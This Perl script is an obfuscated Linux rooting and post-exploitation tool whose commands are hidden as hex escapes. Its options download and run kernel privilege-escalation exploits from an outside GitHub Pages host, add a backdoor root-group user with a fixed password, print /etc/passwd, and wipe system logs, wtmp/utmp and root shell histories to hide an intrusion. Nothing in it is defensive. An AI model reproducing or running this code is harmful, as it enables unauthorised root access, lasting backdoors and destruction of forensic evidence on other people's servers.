#!/usr/bin/perl
# CODE BY B0RU70 - B0RU70.BLOGSPOT.COM
system("\x63\x68\x6D\x6F\x64\x20\x2B\x78\x20\x620\x2E\x70\x6C");
print "\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x420\x52\x55\x370\x2E\x42\x4C\x4F\x47\x53\x50\x4F\x54\x2E\x43\x4F\x4D\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\n";
print "\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x5B\x20\x70\x65\x72\x6C\x20\x620\x2E\x70\x6C\x20\x72\x6F\x6F\x74\x20\x2D\x2D\x3E\x20\x52\x6F\x6F\x74\x65\x64\x20\x53\x65\x72\x76\x65\x72\x20\x5D\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\n";
print "\x23\x23\x23\x23\x23\x23\x5B\x20\x70\x65\x72\x6C\x20\x620\x2E\x70\x6C\x20\x61\x74\x69\x6B\x20\x2D\x2D\x3E\x20\x41\x74\x69\x6B\x6C\x61\x72\x69\x20\x54\x65\x6D\x69\x7A\x6C\x65\x72\x5D\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\n";
print "\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x5B\x20\x70\x65\x72\x6C\x20\x620\x2E\x70\x6C\x20\x6C0\x67\x20\x2D\x2D\x3E\x20\x4C\x6F\x67\x6C\x61\x72\x69\x20\x53\x69\x6C\x65\x72\x20\x5D\x23\x23\x23\x23\x23\n";
print "\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x5B\x20\x70\x65\x72\x6C\x20\x620\x2E\x70\x6C\x20\x75\x73\x65\x72\x73\x20\x2D\x2D\x3E\x20\x55\x73\x65\x72\x6C\x65\x72\x69\x20\x4C\x69\x73\x74\x65\x6C\x65\x72\x20\x5D\x23\x23\x23\x23\x23\n";
print "\x23\x23\x23\x23\x23\x23\x5B\x20\x70\x65\x72\x6C\x20\x620\x2E\x70\x6C\x20\x70\x6F\x63\x20\x2D\x2D\x3E\x20\x50\x6F\x63\x20\x45\x78\x70\x6C\x6F\x69\x74\x69\x6E\x69\x20\x43\x61\x6C\x69\x73\x74\x69\x72\x69\x72\x20\x5D\x23\x23\x23\x23\x23\n";
print "\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x5B\x20\x70\x65\x72\x6C\x20\x620\x2E\x70\x6C\x20\x63\x65\x6E\x74\x7200\x74\x20\x2D\x2D\x3E\x20\x43\x65\x6E\x74\x4F\x53\x20\x53\x77\x20\x72\x6F\x6F\x74\x20\x5D\x23\x23\x23\x23\x23\n";
print "\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x5B\x20\x57\x75\x52\x4B\x61\x43\x20\x54\x65\x61\x4D\x20\x5D\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\n";
print "\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\n";
print "\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x420\x52\x55\x370\x2E\x42\x4C\x4F\x47\x53\x50\x4F\x54\x2E\x43\x4F\x4D\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\n";

if ($ARGV[0] =~ "\x70\x6F\x63" )
{
print "\x45\x78\x70\x6C\x6F\x69\x74\x20\x43\x65\x6B\x69\x6C\x69\x79\x6F\x72\x20\x2E\x2E\x2E\n";
system("\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3A\x2F\x2F\x620\x72\x75\x370\x2E\x67\x69\x74\x68\x75\x62\x2E\x69\x6F\x2F\x45\x78\x70\x6C\x6F\x69\x74\x2F\x4B\x65\x72\x6E\x65\x6C\x7200\x74\x2F\x70\x6F\x63\x2E\x63");
print "\x45\x78\x70\x6C\x6F\x69\x74\x20\x4F\x6C\x75\x73\x74\x75\x72\x75\x6C\x75\x79\x6F\x72\x20\x2E\x2E\x2E\n";
system("\x67\x63\x63\x20\x70\x6F\x63\x2E\x63\x20\x2D\x6F\x20\x70\x77\x6E");
system("\x63\x68\x6D\x6F\x64\x20\x2B\x78\x20\x70\x77\x6E");
print "\x45\x78\x70\x6C\x6F\x69\x74\x20\x43\x61\x6C\x69\x73\x74\x69\x72\x69\x6C\x69\x79\x6F\x72\x20\x2E\x2E\x2E\n";
system("\x2E\x2F\x70\x77\x6E");
}  
if ($ARGV[0] =~ "\x61\x74\x69\x6B" )
{
print "\x74\x75\x6D\x20\x64\x6F\x73\x79\x61\x6C\x61\x72\x20\x74\x65\x6D\x69\x7A\x6C\x65\x6E\x69\x79\x6F\x72\x20\x2E\x2E\x2E\n";
system("\x72\x6D\x20\x64\x69\x72\x74\x79\x2E\x74\x61\x72\x2E\x67\x7A");
system("\x72\x6D\x20\x64\x69\x72\x74\x79\x2E\x63");
system("\x72\x6D\x20\x64\x69\x72\x74\x79");
system("\x72\x6D\x20\x70\x6F\x63");
system("\x72\x6D\x20\x70\x6F\x63\x2E\x63");
system("\x72\x6D\x20\x43\x65\x6E\x74\x4F\x53\x7200\x74\x2E\x7A\x69\x70");
system("\x72\x6D\x20\x43\x65\x6E\x74\x4F\x53\x7200\x74\x2E\x70\x79");
}  
if ($ARGV[0] =~ "\x61\x64\x64\x75\x73\x65\x72" )  
{
print "\x72\x6F\x6F\x74\x20\x75\x73\x65\x72\x20\x65\x6B\x6C\x65\x6E\x69\x79\x6F\x72\x2E\x2E\n";
print "\x75\x73\x65\x72\x20\x3A\x20\x5B\x20\x620\x72\x75\x370\x20\x5D\n";
system "\x61\x64\x64\x75\x73\x65\x72\x20\x2D\x67\x200\x20\x620\x72\x75\x370\x20\x2D\x47\x20\x77\x68\x65\x65\x6C\x2C\x73\x79\x73\x2C\x62\x69\x6E\x2C\x64\x61\x65\x6D\x6F\x6E\x2C\x61\x64\x6D\x2C\x64\x69\x73\x6B\x20\x2D\x64\x20\x2F\x73\x66\x37\x20\x2D\x73\x20\x2F\x62\x69\x6E\x2F\x73\x68";
system "\x70\x61\x73\x73\x77\x64\x20\x620\x72\x75";
print "\x70\x61\x73\x73\x20\x69\x73\x20\x3A\x20\x620\x72\x75\n";
sleep(2);  
 
}
if ($ARGV[0] =~ "\x6C0\x67" )  
{
print "\x54\x75\x6D\x20\x44\x61\x74\x61\x20\x56\x65\x20\x4C\x6F\x67\x6C\x61\x72\x20\x74\x65\x6D\x69\x7A\x6C\x65\x6E\x69\x79\x6F\x72\x2E\x2E\x20\n";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x74\x6D\x70\x2F\x6C\x6F\x67\x73";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x72\x6F\x6F\x74\x2F\x2E\x6B\x73\x68\x5F\x68\x69\x73\x74\x6F\x72\x79";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x72\x6F\x6F\x74\x2F\x2E\x62\x61\x73\x68\x5F\x68\x69\x73\x74\x6F\x72\x79";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x72\x6F\x6F\x74\x2F\x2E\x62\x61\x73\x68\x5F\x6C\x6F\x67\x6F\x75\x74";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x75\x73\x72\x2F\x6C\x6F\x63\x61\x6C\x2F\x61\x70\x61\x63\x68\x65\x2F\x6C\x6F\x67\x73";
sleep(2);
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x75\x73\x72\x2F\x6C\x6F\x63\x61\x6C\x2F\x61\x70\x61\x63\x68\x65\x2F\x6C\x6F\x67";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x76\x61\x72\x2F\x61\x70\x61\x63\x68\x65\x2F\x6C\x6F\x67\x73";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x76\x61\x72\x2F\x61\x70\x61\x63\x68\x65\x2F\x6C\x6F\x67";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x76\x61\x72\x2F\x72\x75\x6E\x2F\x75\x74\x6D\x70";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x76\x61\x72\x2F\x6C\x6F\x67\x73";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x76\x61\x72\x2F\x6C\x6F\x67";
sleep(2);
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x76\x61\x72\x2F\x61\x64\x6D";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x65\x74\x63\x2F\x77\x74\x6D\x70";
system "\x72\x6D\x20\x2D\x72\x66\x20\x2F\x65\x74\x63\x2F\x75\x74\x6D\x70";
system "\x63\x64\x20\x2F\x62\x69\x6E";
print "\t\x42\x61\x73\x61\x72\x69\x6C\x69\x21\x21\x20\n\n";
}
if ($ARGV[0] =~ "\x75\x73\x65\x72\x73" )
{
print "\x4C\x6F\x6F\x6B\x20\x65\x74\x63\x2F\x70\x61\x73\x73\x77\x64\x3A\n";
system("\x63\x61\x74\x20\x2F\x65\x74\x63\x2F\x70\x61\x73\x73\x77\x64");
}
if ($ARGV[0] =~ "\x72\x6F\x6F\x74" )
{
print "\x6B\x65\x72\x6E\x65\x6C\x3A\n";
system("\x75\x6E\x61\x6D\x65\x20\x2D\x61");
print "\x75\x73\x65\x72\x3A\n";
system("\x69\x64");
print "\x72\x6F\x6F\x74\x20\x69\x73\x6C\x65\x6D\x69\x20\x62\x61\x73\x6C\x61\x74\x69\x6C\x64\x69\x2E\x2E\n";
system("\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3A\x2F\x2F\x620\x72\x75\x370\x2E\x67\x69\x74\x68\x75\x62\x2E\x69\x6F\x2F\x45\x78\x70\x6C\x6F\x69\x74\x2F\x4B\x65\x72\x6E\x65\x6C\x7200\x74\x2F\x64\x69\x72\x74\x79\x2E\x74\x61\x72\x2E\x67\x7A");
system("\x74\x61\x72\x20\x2D\x78\x76\x66\x20\x64\x69\x72\x74\x79\x2E\x74\x61\x72\x2E\x67\x7A");
system("\x63\x68\x6D\x6F\x64\x20\x37\x37\x37\x20\x64\x69\x72\x74\x79");
system("\x72\x6D\x20\x2F\x74\x6D\x70\x2F\x70\x61\x73\x73\x77\x64\x2E\x62\x61\x6B");
system("\x2E\x2F\x64\x69\x72\x74\x79");
}
if ($ARGV[0] =~ "\x63\x65\x6E\x74\x7200\x74" )
{
print "\x55\x73\x65\x72\x3A\n";
system("\x69\x64");
print "\x45\x78\x70\x6C\x6F\x69\x74\x20\x43\x65\x6B\x69\x6C\x69\x79\x6F\x72\x20\x2E\x2E\x2E\n";
system("\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3A\x2F\x2F\x620\x72\x75\x370\x2E\x67\x69\x74\x68\x75\x62\x2E\x69\x6F\x2F\x45\x78\x70\x6C\x6F\x69\x74\x2F\x4B\x65\x72\x6E\x65\x6C\x7200\x74\x2F\x43\x65\x6E\x74\x4F\x53\x7200\x74\x2E\x7A\x69\x70");
print "\x45\x78\x70\x6C\x6F\x69\x74\x20\x4F\x6C\x75\x73\x74\x75\x72\x75\x6C\x75\x79\x6F\x72\x20\x2E\x2E\x2E\n";
system("\x75\x6E\x7A\x69\x70\x20\x43\x65\x6E\x74\x4F\x53\x7200\x74\x2E\x7A\x69\x70");
system("\x63\x68\x6D\x6F\x64\x20\x2B\x78\x20\x43\x65\x6E\x74\x4F\x53\x7200\x74\x2E\x70\x79");
print "\x45\x78\x70\x6C\x6F\x69\x74\x20\x43\x61\x6C\x69\x73\x74\x69\x72\x69\x6C\x69\x79\x6F\x72\x20\x2E\x2E\x2E\n";
system("\x2E\x2F\x43\x65\x6E\x74\x4F\x53\x7200\x74\x2E\x70\x79");
} 
